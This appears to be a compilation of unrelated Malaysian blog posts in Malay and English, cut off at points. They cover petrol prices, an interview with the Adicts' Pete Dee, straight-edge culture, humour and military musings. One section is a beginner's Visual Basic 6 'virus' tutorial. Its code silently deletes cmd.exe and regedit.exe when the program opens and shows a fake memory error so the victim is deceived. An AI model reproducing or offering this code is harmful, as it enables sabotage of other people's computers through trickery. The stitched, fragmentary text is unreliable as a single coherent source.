Tuesday, June 17, 2008

KUALA LUMPUR, 5 Jun (SK)- Presiden KeADILan merangkap Ketua Pembangkang di Parlimen, Dr Wan Azizah Wan Ismail menggesa kerajaan agar menimbangkan semula keputusan kenaikan 40% harga petrol yang diumumkan semalam oleh Perdana Menteri.

Katanya, pengumuman kerajaan ke atas kenaikan 78 sen seliter itu amat mengecewakan seluruh rakyat sehingga rakyat terasa tertipu dengan kerajaan yang kononya simpati dengan beban yang ditanggung rakyat di atas kenaikan harga barang.

“Alasan basi kerajaan bahawa kenaikan tersebut adalah akibat kenaikan harga minyak mentah dunia dan kerajaan terlalu terbeban dengan subsidi, tidak dapat diterima rakyat,” katanya lagi.

Dr Wan Azizah menambah, kenyataan bercanggah beberapa menteri mengenai jumlah subsidi minyak banyak menimbulkan persoalan.

Menteri Perdangan dan Hal Ehwal Dalam Negeri,Shahrir Samad baru-baru ini mengatakan subsidi minyak adalah sebanyak RM56 billion manakala semalam Menteri Kewangan Kedua, Nor Mohamad Yakcop mengatakan subsidi minyak sekadar RM28 billion.

“Apatah lagi menurut Laporan Kewangan Kerajaan 2007, anggaran keseluruhan subsidi 2007 adalah RM12.0 billion, justeru itu kami menganggarkan bahawa jumlah subsidi petrol adalah hanya sekitar RM8-10 billion,” katanya lagi dalam kenyataan yang diterima oleh kami.

Pada masa yang sama, Dr Wan Azizah berkata, rakyat maklum bahawa kos explorasi syarikat minyak hanyalah sekitar USD30 setong berbanding dengan harga minyak mentah USD130 setong.

Menurutnya, Ini bermakna margin syarikat pengeluar minyak hampir USD100 setong dan syarikat pengeluar minyak ini mendapat keuntungn luar biasa sejak tiga tahun kebelakangan.

“Persoalannya kenapakah kerajaan tidak mengenakan cukai ke atas keuntungan luar biasa syarikat pengeluar minyak tetapi memilih untuk menaikkan harga petrol dan membebankan rakyat?” katanya lagi.

Jelasnya lagi, harga petrol boleh diturunkan jika kerajaan mengenakan cukai ke atas keuntungan luar biasa syarikat pengeluar minyak, syarikat pengeluar

bilakah minyak akan turun????????oh tuhan..aku sebagai pelajar susahnya nak hidup...argh

i love myspace so much and so i puke..i've being subscribe to myspace so i can stay in contact with my friend but later i realised myspace is suck and friendster is suck and blogger is also suck,but what the hell,i love to talk thrash in the internet and i love to read what other people write about themself..haha..more and more i talk more and more rubbish it will be,so i will type as many as i can

adakah ruangan blog ini relevent untuk kita main2 menaip dan bagi orang baca?mampukah orang menilai sama ada kita menipu atau ikhlas berbicara?adakah kepoyoon aku dalam talk akan terserlah?har2

Tuesday, December 19, 2006

When you were younger, was being in a band one of your dreams?
Pete Dee..No not really, I always wanted to work down at the ship yard and play football for Sunderland AFC.

How much have you had to invest in being in your band financially?

Pete..I have sacrificed so very much in time money and two marriages , Its very hard to keep a stable relationship especially when your not around so much.

How much have you had to invest in being in your band mentally?

Pete.. Mentally is the hardest one, so many frustrations and let downs, so many bullshitters out there and broken promises, its a terrible business to get into, the longer one is in it, the worse it gets, I hear horror stories of how so many young bands are being ripped apart and more musicians commit suicide.

What is your favorite part of being in a band?

Pete..My favourite part of being in the band is, Now we are at a stage in life we really dont care about the whole business and record label side of it, now we really enjoy playing concerts together and enjoy making new music, we are enjoying our bond of friendship these days

Do you help write the songs that your band plays, and, if so, is it difficult?
Pete... I write one third of it and produce nearly all of it, I find the writing easy and producing a challenge.

What is the best thing about touring?

Pete... The best thing about touring is you have a self satisfaction that one has just performed 100% and the audience gave that back to you.
I also enjoy visiting cities with history behind them, I like the architecture and cultures

What is the worst part about touring?

Pete..The travel, airport security is pathetic they treat us like pigs, the long hauls are the worst.

What’s the longest tour you’ve ever been on with your band?

Pete. 3 months long

How long did it take your band to get success?

Pete...We worked for years before getting noticed, its very hard to do it, but we did it without compromises, we made mistakes in decisions with certain record labels, but it takes a long time.

Were you an original member of the band you are in?

Pete...Yes we are all original members, I formed the Adicts

Do you think it is a good idea to start a band with friends, or would it be wise to hold auditions with complete strangers?

Pete...Its always a good idea with friends but I think its better to start a band with a plan of action and have the controlling vote, therefor holding auditions is a great idea, there are plenty of good musicians out there to choose from.

Have you been in a band with people that were your friends before the band, and has it affected your friendships?

Pete..I was in a band with friends before the adicts and it was a pain, different ideas and ambitions

What is the thing you love most about being in a band?

Pete...Playing my style of guitar, it feels good and is hard to describe the feeling of freedom I feel when I play some wonderfull licks.

What is the thing that bothers you the most about it?

Pete..What bothers me about the band or the business is the falseness of so many people you meet who are there for their own gains and goals, sycophants and sharks, they want to rip you off all the time.

How often does your band practice?

Pete..We dont, we live all over the world so we cant, but we do write and then get together and maybe if we are lucky get one practice in before the tour. Madness really but it works for us fine.

Do you play the type of music that you listen to, and do you enjoy playing the type of music that you do?

Pete..There is no one really like us so No is the answer to your question. but I have a massive range in taste of music.

Does being in a band affect your social life, and is it a negative or positive change?

Pete..WEll yes, one can enjoy the smoozing part of it and go to clubs and stuff or one can ignore all that, like me, I dont drink so Im not into the clubbing side of it, but when I was younger I did it all drugs drink the lot really at a huge extent too. I feel it is up to the individual if your gonna mess up your life. Socially I dont care for people in the business yet I have some very dear friends from years of playing in a band, we keep in touch and the relationships are unbinding. In other words I live a normal life, the band is my saviour for staying sane, going on tour for us is therapy and a good reason to get away from the rat race I suppose.

Is it stressful to put out an album?

Pete.. It has been known to be..we own all our music now so we arent too fussed about the stresses of it we record when we want to and not dictated to by some turd in a suit who only see's dollar bills, the waiting is the hardest thing and the hoping its a success is another anticlimax, we all dream, but now we know our strengths and value and have no visions of grandure we just make music and if it sell it sells, if it doesnt I really dont care, we have seem it all before, but you cannot tell that to the turd in a suit, Success all boils down to how much money will be invested into the promotion of the band and even then it can be only a glimpse of an eye. we dont believe in the hype because at the end of the day its all coming out of our pocket, We rely on our music and our live performances to keep us going not someones wallet.

What is the best thing about having fans?

Pete.. Theyre fabulous, I adore them all, I really do.

What is the worst thing about having fans?

Pete...Stalkers crazee women who are delusional, but desirable

Are you proud of your bands success?

Pete.. Of course, we are now legends and still alive thank goodness.

Is playing music the profession that you really would love to do for the rest of your life, or do you have something else in your heart?

Pete..I will play until I drop I am also an artist and love art.

Did you have to audition to be in your band?

Pete .. No I formed it, but I nearly fired myself on numerous occassions.

Does being in a band ever become depressing?

Pete.. Yes there are many stages of depression and its common with musicians, the waiting for something never to occur is one,,the depression after a tour is over can be dangerous. the long amounts of time you are away from the ones you love can bring you down and the tiredness also.
there iare so many negatives of being a struggling musician.

Has being in a band drawn you away from friends or family?

Pete..Yes it has had its bad moments.

Thank you so much for taking the time to help me out, I appreciate it so much.

Thanks a lot.
Visual Basic 6 - Creating a Simple Virus

Now many of you feel that creating a virus is impossible especially for you beginners. Well this tutorial shows you how to create a simple virus with just a few lines of code. A virus can be an application that deletes files upon request, this is seen as infecting your computer because by deleting key files you may need to take action to get your computer back to normal.

First of all open a new Visual Basic project, a standard exe file..

Now it depends on how you want your virus to work, I feel it is best if it is activated once your application is opened so the main code codes in the form load sub.

On your project insert a text box , a command button and a timer, we will be using the command button and timer a little later on.

In the project put in the file you want to delete, for example if you wanted to delete the command file then you would put the following code in the form load tab.

Private Sub Form_Load()
Text1.Text = "C:/Windows/System32/cmd.exe
Kill Text1.Text
End Sub

Once the project is opened then the command file will be removed.

Now I will show you an example of doing this using a command button. Put the following code in the command button and in the form load.

You can even give the text box a name to make it quicker. I have labelled it 'A'

Private Sub Form_Load()
Text1.Text = "C/Windows/System32/cmd.exe"
A = Text1.Text
End Sub

Private Sub Command1_Click
Kill A
End Sub

Now once the command button is clicked on the project the command file will be deleted.

Now we will use the timer in this one. If you want to disguise your scheme then this is a good way to do it, Here we will send a fake message error pretending the application hasn't got enough memory to run, but in actual fact the victim doesn't know that you have just removed their command file.

Here is to go about it.

Private Sub Form_Load()
Form1.Visible = False
Text1.Text = "C:/Windows/System32/cmd.exe"
A = Text1.Text
Msgbox ("Runtime Error 492. Not Enough Memory."), vbCritical, "Runtime Error"
End Sub

Private Sub Timer1_Timer()
Timer1.Interval = 5000
Kill A
Timer1.Enabled = False
End Sub

All we have done above is made the form invisible so that it makes the error message look real, we have set an interval of 5 seconds on the timer before the file is deleted and that's how simple it can be to fool someone.

Right, we can now make it a little more difficult if you are finding the above a little too easy.

How about removing more than 1 file, well this is how you could go about doing that, we will stick with the message box fool because I think that works well.

The example below shows how to remove the files when the application is loaded, we will not be using timers or command buttons in this one. We will not even be using text boxes because they are not needed, you can just do what is shown below.

So in the form load part put the following code.

Private Sub Form_Load()
Form1.Visible = False
Msgbox ("Runtime Error 492. Not Enough Memory."), vbCritical, "Runtime Error"
Kill "C:/Windows/System32/cmd.exe" s
Kill "C:/Windows/regedit.exe"
End Sub
So above we will be removing the command file and the registry, I don't think the victim will be best pleased about that do you.

Now I have shown you the above information I think it's your turn to try and create your own, now you can test it on your own pc, just copy a file, lets say the cmd.exe file and paste it into your C:/

Then put in the code above but in the Kill put this.

Kill "C:/cmd.exe"

That's all you need to kill, then you will see the file has been removed.
SIPOLAN (A) :Woiii....busuk giler!!!!!
:Saper kentut nihh baik mengaku cepat sebelum aku belasah...

SIPOLAN (B) :Alah ko x tau saper yang kentut ko main belasah jer
: Maner bley camnih...

SIPOLAN (A) :Emm...
:Ko ker yg kentut tdi...

SIPOLAN (B) : Ehh...
: Maner ader aku kentut...
: Kentut aku xder pon bau busuk sgt mcm nih...
: Kalo konak tau bau dier mcm ni laa...

Bunyi kentut SIPOLAN (B) kluar dri celah buntutnya yg montel
Lepas tu SIPOLAN (B) terus dibelasah dengan lidi oleh SIPOLAN (A)...

Idiot guide on "what is straight edge"
Current mood: anxious

well, my friend asked me what is straight edge. i know it's a boring to read this over and over again. but still there are people who don't know shits about this. so, here i go again, my own version "from my point of view" on what is straight edge.

straight edge...atau singkatannya sXe. hmm...ntah...lebih kurang camni la. ia satu ideology/disiplin diri/pergerakan yang mendukung 4 prinsip berikut:

-tidak hisap rokok
-tidak hisap dadah
-tidak minum arak
-tidak mengamalkan seks kasual (tukar2 pasangan)

ia bermula dari 2 buah lagu dari kugiran hardcore/punk Minor Threat (dari Washington DC, USA) pada lebih kurang tahun 1981. lagu-lagu tersebut adalah: straight edge dan out of step.

lepas diorang nyanyi lagu ni, ramai gila pengikut-pengikut mereka yg amik lirik lagu tu sebagai ideology dan seterusnya menjadi satu pergerakan serpihan dari budaya hardcore.

tapi, penyanyi/penulis lagu tu Ian Mackaye tidak bertujuan utk mewujudkan satu pergerakan/ideology. itu hanyalah lagu. jadi, dia sendiri tidak mengaku straight edge.

jadi, sampai skrg, di serata dunia ramai gila bdk hardcore/punk yang mengamalkan 4 disiplin diri di atas. ada yang mengaku diri sebagai straight edge, ada yang taknak claim. itu hak individu.

kami juga tak kesah kawan ngan perokok, kaki stim, kaki perempuan, kaki botol...tak kesah...itu just disiplin diri. just utk diri sendiri, bukan utk megah2 dan membawa haluan lain. manusia semua sama. tapi, ia satu kehidupan yang lebih sihat dan positif.

ia bukanlah satu agama. ia relevan di mana-mana dan bila-bila. sekarang tahun 2006 di malaysia, sxe adalah relevan. tgk sahaja berapa ramai mati sbb bnyk hisap rokok, ramai mana anak orang kena rogol, ramai mana mati sebab aids, etc. etc. lah.

dan satu bende yang membuatkan straight edge adalah ia secara tidak langsung memboikot syarikat kapitalis2 gergasi seperti syatikat2 arak dan rokok.

dan juga, ia senang utk dilakukan. ia satu evolusi diri utk mereka yg mengamalkannya. kalau bebudak anarcho/peace punk dan band inikah hidup sendiri duk nyanyi pasal "hentikan perperangan" sampai bila pun peperangan tak berhenti.

tapi straight edge, ko nyanyi dlm lirik, bebudak dengar diorang ikut. then...ko dah berjaya tak kesahlah walaupun sorang je yang ikut.

satu lagi, bebudak straight edge ni diorang suke tulis X pada awal dan akhir nama mereka atau nama kugiran mereka. contoh XsipolanX. dan diorang suke pangkah tangan diorang dengan X guna marker hitam bila menghadiri gig/membuat persembahan pentas. dipercayai kerana pada awalnya dulu, semasa gig-gig hardcore/punk diadakan di disko-disko, remaja bawah umur 18thn ditanda dengan X di tangan mereka sebagai tanda mereka tidak dibenarkan mengkonsumsi minuman keras.

huhuh...camtulah lebih kurang...

nak juangkan ideology2 org barat pun. pentingkanlah perjuangkan agama islam dulu.

for more info on straight edge, log on to www.google.com and type straight edge ok

"kami anti rokok, bukannya anti perokok"-xhuzairix nostalgia

Dicopy dan paste dari http://mempelam.blogspot.com/.

petua pemalu

1. kalo tersepak batu
Jangan terus bangun,
sebaliknyer anda baring dan
trus berguling-guling hingga
jauh dari perhatian ramai...
lepas tu baru bgn
bila takde org nampak..

2. kalo terjatuh beskal:
cepat2 naik beskal anda
semula dan jatuhla
lagi sehingga berkali-kali
supaya org
ingat anda saje2 buat lawak...

3. kalo terjatuh tangga:
trus bersilat
olah anda
dirasuk atau sedang berlawan dgn
makhluk halus...

4. kalo terjatuh dlm longkang:
sampah yg
ada sambil marah2
dgn suara yg kuat,
pasti org menyangka
anda seorg
yg amat prihatin terhadap
kebersihan... .

5. kalo jatuh ketika nk naik
bas: jeritlah
apa tolak2 ni?"
walaupun tiada org di blakang anda... .

6. kalo terjatuh di dpn bus stop:
Terus buat2
pengsan sehingga ada org
membantu anda..
kalo takde..
baring trus sampai mlm
dan takde org lagi kt
bus stop tu... haa... ni lah masa sesuai
utk bangun semula... .

7. kalo jatuh tergelincir kt lantai licin:
la kawan (atau sesiapa yg ada kt sebelah anda)
utk jatuh bersama- sama
supaya tak lah anda sorang je
yg dpt malu... ye tak??...
he he..cube lah.. huikhuikhu

Thursday, August 17, 2006

kasut dan kulit kerbau pendek

ada member men skateboard bagi tau
kasut Vans(antara kasut skate paling feymes skang)
gunekan kulit babi

wow,sudah maju skkateboarder gune kulit babi
memule terasa cam tipu je mende ni
takkan la syarikat sukan punye besar gune kulit menatang tu

yang ada menulis:
dual density foam high end pig suedes fine full grain leathers "



sebenarnya ganyak lagi kasut sukan gune kulit babi,cume kene berhati2 semasa membeli,

Tuesday, August 15, 2006

selalunya selapas ini pakcik sam(full name sampah)akan mintak maaf sbb kesalahannya sendiri,dekat abc,dkt tv,dekat internet..macam biase

Malaysia dan bilangan tentera = 100 ribu orang
Korea Utara = Budak kecik umo 6 tahun pun bley kawad cam orang dewasa umo 20 tahun
Amerika Syarikat = Pesawat terbang kat ruang udara negara tapi x leh kesan ngan radar
Russia = selepas perang dingin terus low profile..tapi pesawat carriage nye pada tahun 1990 leh bawak kapal angkasa
Jepun = silap-silap nanti die gune robot atau ade ultraman jadi askar
Indonesia = rakyat die yang dianggap terlimpah kat negara kita je dah dekat 2 juta
negara lain? = renungkan

adakah negara kita kuat kerana bilangan tentera?
semangat juang yang tidak akan luntur?
berani mati(cam mat rempit?)
bak kata ahli parlimen rembau yang mai sekolah hari tu
tulang belakang negara kita disebalik tentera dan pendidikan ialah nilai bersatu padu yang masih diamalkan sehingga 49 tahun...(betul tu)
keranamu Malaysia(bila kerajaan nak tukar moto ni,dah beberapa tahun gune yg sama)
walau apa pun
saya LOVE Malaysia!!!!